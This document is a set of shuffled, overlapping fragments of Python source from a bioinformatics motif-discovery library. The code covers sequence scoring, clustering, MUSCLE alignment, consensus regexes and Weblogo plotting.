"= x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing",
"binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size =",
"_seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for x in zip(*seqs)]",
"sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs",
"= pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15)",
"+ ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h,",
"np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs,",
"val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val,",
"curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1",
"else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs",
"class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', #",
"+= pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size",
"= mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for",
"seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq = components",
"estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"norm = row[i] if norm != 0: row /= norm else: row =",
"seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' +",
"on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def",
"motives: for j in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j",
"ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit",
"True, motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3,",
"= dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq,",
"'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j, n_j,",
"= np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig),",
"results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)]",
"% (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\"",
"motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200,",
"len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins,",
"= [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end",
"popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting",
"motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\"",
"estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs,",
"headers, data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is True:",
"sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign",
"matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for",
"else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size =",
"score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all')",
"1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data =",
"imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return",
"yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None:",
"\"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start =",
"0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname",
"[score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100,",
"method='single') orders = [] for id1, id2 in c[:, 0:2]: if id1 <",
"logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if",
"= k[1][1] else: val = k[0][1] if float(val) / dim >= min_freq: score",
"np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c = Counter(row) k",
"max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info =",
"serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = []",
"loc_start_time = time.time() scores = p.get() scores_items += scores d_time = time.time() -",
"i) for i in motives], reverse=True): info = ' - %.2s %s' %",
"time.time() if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results",
"subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score']",
"\"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f",
"self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in %.2f secs' %",
"= [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y",
"seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers, instances =",
"scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic',",
"------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(),",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0]",
"(av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i,",
"error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96,",
"= dict() for cluster_id in clusters: start_time = time.time() # align with muscle",
"import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import",
"Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord",
"pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"else: figname = None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs",
"'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format",
"orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs: str_list",
"logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc =",
"random_state self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution",
"subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header",
"seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster",
"cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] =",
"options.resolution = resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format =",
"centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected =",
"seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment",
"break # TODO: run the predictor to learn the new class definition logger.debug('After",
"= time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq,",
"defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) /",
"i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size])",
"size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp",
"subseq = components p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin,",
"estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack,",
"size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives:",
"distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds",
"if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>')",
"output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report. Try more permissive",
"n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if",
"i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while",
"= k[0][1] if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs =",
"return True, motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10,",
"cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix K cluster_vecs =",
"maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet",
"seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score",
"filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4,",
"cluster_ids = set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j]",
"score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray(",
"in lines: if line: if line[0] == '>': if seq: yield seq seq",
"options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends =",
"else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() -",
"ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='',",
"[list(x) for x in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances):",
"% e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs,",
"estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1:",
"= show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint",
"int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id",
"ids[i] end = ids[i + 1] width = end - start val =",
"consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq,",
"set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1",
"motives, similarity_th=0.8): for i in motives: for j in motives: if j >",
"= int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self,",
"return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in",
"and len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4,",
"%.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"cluster = np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c =",
"and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] +",
"ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning:",
"style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else:",
"as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd()",
"logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' %",
"data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1):",
"import defaultdict from eden import apply_async import numpy as np from scipy.sparse import",
"def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if",
"mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time =",
"loc_start_time = time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix =",
"seqs} return True, motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6,",
"== sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for",
"= options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input",
"for j in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j =",
"in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives)",
"consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s'",
"h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end =",
"pad_inches=0) else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable,",
"= cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm = row[i]",
"np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len))",
"pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores",
"stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position",
"options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label:",
"plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_'",
"compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for",
"= h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end),",
"= None for scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len:",
"if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives =",
"= 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw()",
"alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ):",
"len(code) == 0: code_str = None elif len(code) == 1: code_str = code[0]",
"align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf':",
"= p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time = time.time()",
"+= 1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq = [a",
"% (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items",
"d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable,",
"orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in",
"def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len -",
"similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for",
"orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size)",
"= plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in",
"= cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)),",
"self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d",
"= [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results =",
"in align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a'))",
"txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id",
"min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq =",
"= False for rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j,",
"' - num occurrences of regex: %d' % (co) txt.append(info) info = '",
"fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix =",
"SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as re",
"Vectorizer from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline",
"- consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives,",
"len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs",
"for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices +=",
"stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating",
"load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit(",
"= ' deleting: %d [%d is now #%d]' % \\ (j, i, n_i",
"= np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def fit(self, scores):",
"consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else:",
"+ fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img",
"compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png',",
"is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet)",
"h, s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1",
"= [] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get()",
"transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def",
"in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1] *",
"enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time()",
"min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size)",
"k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val)",
"plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig(",
"min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return",
"j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is now #%d]' %",
"m = s + (e - s) / 2 locs.append(m) if locs: avg_loc",
"== 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): #",
"alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters",
"(logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute. Try more permissive",
"multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs",
"model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try:",
"data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time()",
"estimator=estimator) scores = [score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable,",
"in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers,",
"'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False, None",
"min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i",
"score, begin, end, subseq = components p = self.compute_p_value(score) if p <= p_value:",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try:",
"[] for h, align_seq in align_seqs: trimmed_align_seq = [a for i, a in",
"sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster",
"scores_items += scores d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for",
"rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th:",
"xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF",
"seq seq = \"\" line_str = str(line) yield line_str.strip() else: line_str = line.split()",
"new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray",
"distances = compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info) figname",
"= ' - num occurrences of regex: %d' % (co) txt.append(info) info =",
"vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if",
"orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if i not",
"= self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr",
"start val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\"",
"- num occurrences of regex: %d' % (co) txt.append(info) info = ' -",
"\"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers, instances = [list(x)",
"%d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname,",
"% (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds",
"weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna']",
"logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) /",
"motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co =",
"= None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = []",
"def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id",
"options.show_errorbars = error_bars if title: options.title = title if figure_label: options.logo_label = figure_label",
"yield orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason:",
"0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i,",
"return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10,",
"'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin):",
"# ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='',",
"centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end -",
"def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds =",
"cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c",
"binary_preds = [] true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)):",
"# seperate headers headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type",
"if fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format def create_logo(self,",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep",
"distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b =",
"match.end() m = s + (e - s) / 2 locs.append(m) if locs:",
"subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"[apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f",
"figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if",
"\"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if count / float(size)",
